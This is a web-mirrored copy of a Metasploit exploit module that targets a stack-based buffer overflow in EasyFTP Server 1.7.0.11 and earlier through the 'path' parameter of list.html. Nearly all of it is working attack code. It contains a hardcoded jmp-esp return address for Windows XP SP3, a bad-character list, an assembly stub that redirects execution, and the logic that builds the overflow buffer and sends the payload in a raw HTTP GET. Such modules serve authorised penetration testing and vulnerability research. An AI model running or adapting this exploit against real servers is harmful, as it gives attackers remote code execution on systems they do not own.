Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/easyftp_list.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GreatRanking
8
9
HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] }
10
11
include Msf::Exploit::Remote::HttpClient
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'EasyFTP Server list.html path Stack Buffer Overflow',
18
'Description' => %q{
19
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11
20
and earlier. EasyFTP fails to check input size when parsing the 'path' parameter
21
supplied to an HTTP GET request, which leads to a stack based buffer overflow.
22
EasyFTP allows anonymous access by default; valid credentials are typically
23
unnecessary to exploit this vulnerability.
24
25
After version 1.7.0.12, this package was renamed "UplusFtp".
26
27
Due to limited space, as well as difficulties using an egghunter, the use of
28
staged, ORD, and/or shell payloads is recommended.
29
},
30
'Author' => [
31
'ThE g0bL!N', # Original exploit [see References]
32
'jduck' # Metasploit re-implementation
33
],
34
'References' => [
35
[ 'OSVDB', '66614'],
36
[ 'EDB', '11500' ]
37
],
38
'DefaultOptions' => {
39
'EXITFUNC' => 'thread'
40
},
41
'Privileged' => true,
42
'Payload' => {
43
'Space' => 256,
44
'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2b\x2f\x3b\x3f\x5c",
45
'Compat' =>
46
{
47
'ConnectionType' => '+ws2ord',
48
},
49
},
50
'Platform' => 'win',
51
'Targets' => [
52
[
53
'Windows XP SP3 - Easy FTP Server Universal',
54
# NOTE: It's not possible to use addresses within the
55
# binary due to the nul byte.
56
{
57
'Ret' => 0x7cc5d507 # jmp esp in shell32.dll
58
# 'Ret' => 0xdeadbeef
59
}
60
]
61
],
62
'DefaultTarget' => 0,
63
'DisclosureDate' => '2010-02-18',
64
'Notes' => {
65
'Reliability' => UNKNOWN_RELIABILITY,
66
'Stability' => UNKNOWN_STABILITY,
67
'SideEffects' => UNKNOWN_SIDE_EFFECTS
68
}
69
)
70
)
71
72
register_options(
73
[
74
Opt::RPORT(8080),
75
OptString.new('HttpUsername', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
76
OptString.new('HttpPassword', [true, 'The HTTP password to specify for basic authentication', '[email protected]'])
77
]
78
)
79
end
80
81
def check
82
info = http_fingerprint # check method
83
if info and (info =~ /Easy\-Web Server\//)
84
return Exploit::CheckCode::Detected
85
end
86
87
Exploit::CheckCode::Safe
88
end
89
90
def exploit
91
if (payload.encoded.length > payload_space)
92
fail_with(Failure::Unknown, "Insufficient space for payload, try using a staged, ORD and/or shell payload.")
93
end
94
95
# Fix up ESP, jmp to the beginning of the buffer
96
stub_asm = %q{
97
mov edi, esp
98
add esp, 0xfffffc04
99
add edi, 0xfffffee8
100
jmp edi
101
}
102
stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string
103
104
# Build the path up
105
path = ''
106
path << payload.encoded
107
path << rand_text(268 - path.length)
108
# NOTE: It's possible to overwrite SEH, however SafeSEH is in effect.
109
path << [target.ret].pack('V')
110
path << rand_text(280 - path.length)
111
path << stub
112
path << rand_text(332 - path.length)
113
114
uri = "/list.html?path="
115
uri << path
116
117
print_status("Trying target #{target.name}...")
118
res = send_request_raw({ 'uri' => uri }, 5)
119
120
if (res)
121
print_error("The server unexpectedly responded, this is not good.")
122
print_status(res.to_s)
123
end
124
125
handler
126
end
127
end
128
129